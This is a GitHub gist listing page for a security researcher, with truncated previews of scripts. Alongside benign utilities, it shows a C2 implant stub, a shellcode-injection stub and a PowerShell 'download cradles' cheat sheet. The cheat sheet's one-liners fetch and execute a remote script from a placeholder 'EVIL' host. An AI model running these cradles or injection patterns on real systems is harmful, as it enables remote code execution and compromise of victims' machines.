Skip to content

Instantly share code, notes, and snippets.

Avatar
👋
Arrivederci!

Marcello byt3bl33d3r

👋
Arrivederci!
View GitHub Profile
@byt3bl33d3r
byt3bl33d3r / ducky-convert.py
Last active August 29, 2015 14:13
Converts the USB rubber ducky property files to a suitable format for the keyseed.py file in the kali nethunter project
View ducky-convert.py
#! /usr/bin/env python
from configobj import ConfigObj
import sys
import StringIO
import re
from pprint import pprint
if len(sys.argv) < 3:
print 'Usage: ducky-convert.py <keyboard.properties> <layout.properties>'
View duckhunter.py
#! /usr/bin/env python
import sys
import re
import os
from decimal import Decimal #for conversion milliseconds -> seconds
if len(sys.argv) < 2:
print 'Usage: duck-hunter.py <duckyscript> output.txt'
#print 'Usage: duck-hunter.py <duckyscript> <language> output.txt'
@byt3bl33d3r
byt3bl33d3r / keybase.md
Created April 12, 2015 10:33
keybase.md
View keybase.md

Keybase proof

I hereby claim:

  • I am byt3bl33d3r on github.
  • I am byt3bl33d3r (https://keybase.io/byt3bl33d3r) on keybase.
  • I have a public key whose fingerprint is F875 2C5D DC1B 9EB1 9073 C30D A2A9 C1F5 F948 B62B

To claim this, I am signing this object:

@byt3bl33d3r
byt3bl33d3r / CVE2Java.py
Created May 12, 2015 02:00
Parses a Java 'Vulnerability Details' page on http://www.cvedetails.com and prints all of the Java version strings affected (e.g '1.6.0.23')
View CVE2Java.py
#! /usr/bin/env python2
import requests
import lxml.html
import sys
r = requests.get(sys.argv[1])
tree = lxml.html.fromstring(r.text)
try:
@byt3bl33d3r
byt3bl33d3r / keybase.md
Created June 18, 2015 03:20
Keybase proof
View keybase.md

Keybase proof

I hereby claim:

  • I am byt3bl33d3r on github.
  • I am byt3bl33d3r (https://keybase.io/byt3bl33d3r) on keybase.
  • I have a public key whose fingerprint is 7069 4855 F807 0C99 9731 C777 60FA BDD3 A6E1 5E81

To claim this, I am signing this object:

@byt3bl33d3r
byt3bl33d3r / shodan_getuphosts.py
Created November 10, 2015 21:43
Get up hosts using Shodan! Takes as input a comma separated subnet list
View shodan_getuphosts.py
import shodan
import sys
from shodan import APIError
from netaddr import IPNetwork
SHODAN_API_KEY= 'APIKEY'
api = shodan.Shodan(SHODAN_API_KEY)
targets = map(IPNetwork, sys.argv[1].split(','))
@byt3bl33d3r
byt3bl33d3r / SILENTTRINITY.cs
Last active October 13, 2018 00:38
SILENTTRINITY c# stub with embedded IPY stdlib support
View SILENTTRINITY.cs
using System;
using IronPython.Hosting;
using IronPython.Modules;
//using IronPython.Runtime;
using System.IO;
using System.Linq;
using System.Reflection;
using Microsoft.Scripting.Hosting;
using Microsoft.Scripting.Utils;
using System.Collections.Generic;
@byt3bl33d3r
byt3bl33d3r / ecdh_eke.py
Last active October 16, 2018 23:02
ECDH Encrypted Key Exchange (IronPython 2.7.8)
View ecdh_eke.py
from System.IO import MemoryStream
from System.Text import Encoding
from System.Security.Cryptography import Aes, AsymmetricAlgorithm, CryptoStream, CryptoStreamMode
class DiffieHellman:
def __init__(self):
self.aes = Aes.Create()
self.diffieHellman = AsymmetricAlgorithm.Create("ECDiffieHellmanCng")
self.PublicKey = self.diffieHellman.PublicKey.ToByteArray()
@byt3bl33d3r
byt3bl33d3r / shellcode.boo
Last active December 7, 2018 22:57
Boolang shellcode injection via CreateThread/WaitForSingleObject
View shellcode.boo
import System.Runtime.InteropServices
from System import IntPtr
[DllImport("kernel32.dll")]
def VirtualAlloc(lpStartAddr as int, size as int, flAllocationType as int, flProtect as int) as int:
pass
[DllImport("kernel32.dll")]
def CreateThread(lpThreadAttributes as int, dwStackSize as int, lpStartAddress as int, param as int, dwCreationFlags as int, lpThreadId as int) as int:
pass
@byt3bl33d3r
byt3bl33d3r / DownloadCradles.ps1
Created December 13, 2018 02:25 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
View DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object